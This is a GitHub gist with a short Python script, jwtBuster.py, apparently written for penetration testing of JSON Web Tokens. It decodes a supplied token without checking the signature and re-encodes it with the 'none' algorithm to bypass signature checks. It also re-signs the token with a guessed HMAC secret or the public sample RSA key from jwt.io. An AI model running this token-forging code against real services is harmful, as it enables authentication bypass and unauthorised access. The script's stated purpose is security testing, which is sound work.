Last active
October 20, 2021 11:05
-
-
Save Anon-Exploiter/8363e20d76d42e0177c34023318b6faf to your computer and use it in GitHub Desktop.
For pentesting the JWT token, fetching it's body, type, and signing it with a random string or pem file (based on type being used). Also, returns None type JWT.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from sys import argv | |
import json | |
import jwt | |
JWTSECRET = "jwtSecretKeyEncryption" | |
PRIVATEKEY = """-----BEGIN RSA PRIVATE KEY----- | |
MIIEogIBAAKCAQEAnzyis1ZjfNB0bBgKFMSvvkTtwlvBsaJq7S5wA+kzeVOVpVWw | |
kWdVha4s38XM/pa/yr47av7+z3VTmvDRyAHcaT92whREFpLv9cj5lTeJSibyr/Mr | |
m/YtjCZVWgaOYIhwrXwKLqPr/11inWsAkfIytvHWTxZYEcXLgAXFuUuaS3uF9gEi | |
NQwzGTU1v0FqkqTBr4B8nW3HCN47XUu0t8Y0e+lf4s4OxQawWD79J9/5d3Ry0vbV | |
3Am1FtGJiJvOwRsIfVChDpYStTcHTCMqtvWbV6L11BWkpzGXSW4Hv43qa+GSYOD2 | |
QU68Mb59oSk2OB+BtOLpJofmbGEGgvmwyCI9MwIDAQABAoIBACiARq2wkltjtcjs | |
kFvZ7w1JAORHbEufEO1Eu27zOIlqbgyAcAl7q+/1bip4Z/x1IVES84/yTaM8p0go | |
amMhvgry/mS8vNi1BN2SAZEnb/7xSxbflb70bX9RHLJqKnp5GZe2jexw+wyXlwaM | |
+bclUCrh9e1ltH7IvUrRrQnFJfh+is1fRon9Co9Li0GwoN0x0byrrngU8Ak3Y6D9 | |
D8GjQA4Elm94ST3izJv8iCOLSDBmzsPsXfcCUZfmTfZ5DbUDMbMxRnSo3nQeoKGC | |
0Lj9FkWcfmLcpGlSXTO+Ww1L7EGq+PT3NtRae1FZPwjddQ1/4V905kyQFLamAA5Y | |
lSpE2wkCgYEAy1OPLQcZt4NQnQzPz2SBJqQN2P5u3vXl+zNVKP8w4eBv0vWuJJF+ | |
hkGNnSxXQrTkvDOIUddSKOzHHgSg4nY6K02ecyT0PPm/UZvtRpWrnBjcEVtHEJNp | |
bU9pLD5iZ0J9sbzPU/LxPmuAP2Bs8JmTn6aFRspFrP7W0s1Nmk2jsm0CgYEAyH0X | |
+jpoqxj4efZfkUrg5GbSEhf+dZglf0tTOA5bVg8IYwtmNk/pniLG/zI7c+GlTc9B | |
BwfMr59EzBq/eFMI7+LgXaVUsM/sS4Ry+yeK6SJx/otIMWtDfqxsLD8CPMCRvecC | |
2Pip4uSgrl0MOebl9XKp57GoaUWRWRHqwV4Y6h8CgYAZhI4mh4qZtnhKjY4TKDjx | |
QYufXSdLAi9v3FxmvchDwOgn4L+PRVdMwDNms2bsL0m5uPn104EzM6w1vzz1zwKz | |
5pTpPI0OjgWN13Tq8+PKvm/4Ga2MjgOgPWQkslulO/oMcXbPwWC3hcRdr9tcQtn9 | |
Imf9n2spL/6EDFId+Hp/7QKBgAqlWdiXsWckdE1Fn91/NGHsc8syKvjjk1onDcw0 | |
NvVi5vcba9oGdElJX3e9mxqUKMrw7msJJv1MX8LWyMQC5L6YNYHDfbPF1q5L4i8j | |
8mRex97UVokJQRRA452V2vCO6S5ETgpnad36de3MUxHgCOX3qL382Qx9/THVmbma | |
3YfRAoGAUxL/Eu5yvMK8SAt/dJK6FedngcM3JEFNplmtLYVLWhkIlNRGDwkg3I5K | |
y18Ae9n7dHVueyslrb6weq7dTkYDi3iOYRW8HRkIQh06wEdbxt0shTzAJvvCQfrB | |
jg/3747WSsf/zBTcHihTRBdAv6OmdhV4/dD5YBfLAkLrd+mX7iE= | |
-----END RSA PRIVATE KEY-----""" # Key taken from jwt.io | |
""" | |
ToDos | |
- Read some articles and find other ways to encode/encrypt/test the token | |
ToDos Done | |
- Print the JWT | |
- Print the decoded JWT | |
- Find the Type of Encryption/Encoding being done in the Token | |
- `Encode` the JWT token with None type | |
- Find the encoding/encryption mechanism and encrypt the token specific to that | |
- Encrypt the JWT token with HS128 | |
- Encrypt the JWT token with HS256 | |
- Encrypt the JWT token with RS256 | |
- Encrypt the JWT token with RS512 | |
Member: | |
- Do try other encryption types' tokens too, don't just use the same type always! (hooman specific) | |
""" | |
def printData(heading, data): | |
print("-" * 30) | |
print(f"[#] {heading}") | |
print("-" * 30) | |
print(data) | |
print("-" * 30) | |
print() | |
def decodeJWT(token): | |
decodedToken = json.dumps(jwt.decode(token, verify=False), indent=4) | |
printData('Decoded JWT Data', decodedToken) | |
return(decodedToken) | |
def JWTHeader(token): | |
jwtHeader = jwt.get_unverified_header(token) | |
printData("JWT Header", jwtHeader) | |
return(jwtHeader['alg'], jwtHeader) | |
def encodeWithNONE(decodedJWT): | |
decodedToken = json.loads(decodedJWT) | |
tokenWithNONE = jwt.encode(decodedToken, key='', algorithm=None).decode() | |
printData("JWT encoded token with type `None`", tokenWithNONE) | |
def jwtEncodingEncryption(algo, body): | |
if algo == 'HS256': | |
encryptedToken = jwt.encode(json.loads(body), key=JWTSECRET, algorithm='HS256').decode() | |
elif algo == 'HS384': | |
encryptedToken = jwt.encode(json.loads(body), key=JWTSECRET, algorithm='HS384').decode() | |
elif algo == 'HS512': | |
encryptedToken = jwt.encode(json.loads(body), key=JWTSECRET, algorithm='HS512').decode() | |
elif algo == 'RS256': | |
encryptedToken = jwt.encode(json.loads(body), PRIVATEKEY, algorithm='RS256').decode() | |
elif algo == 'RS384': | |
encryptedToken = jwt.encode(json.loads(body), PRIVATEKEY, algorithm='RS384').decode() | |
elif algo == 'RS512': | |
encryptedToken = jwt.encode(json.loads(body), PRIVATEKEY, algorithm='RS512').decode() | |
else: | |
encryptedToken = "[!] This token doesn't has any module currently, please file a issue against this! :)" | |
printData(f"JWT encoded token with type `{algo}`", f"{encryptedToken}") | |
def main(): | |
jwtToken = argv[1] | |
printData('JWT Token', jwtToken) | |
JWTheaders = JWTHeader(jwtToken) | |
decodedJWT = decodeJWT(jwtToken) | |
encodeWithNONE(decodedJWT) | |
jwtEncodingEncryption(JWTheaders[0], decodedJWT) | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
What does it do?
Encode
the JWT token with None typeRun with:
python3 jwtBuster.py "token"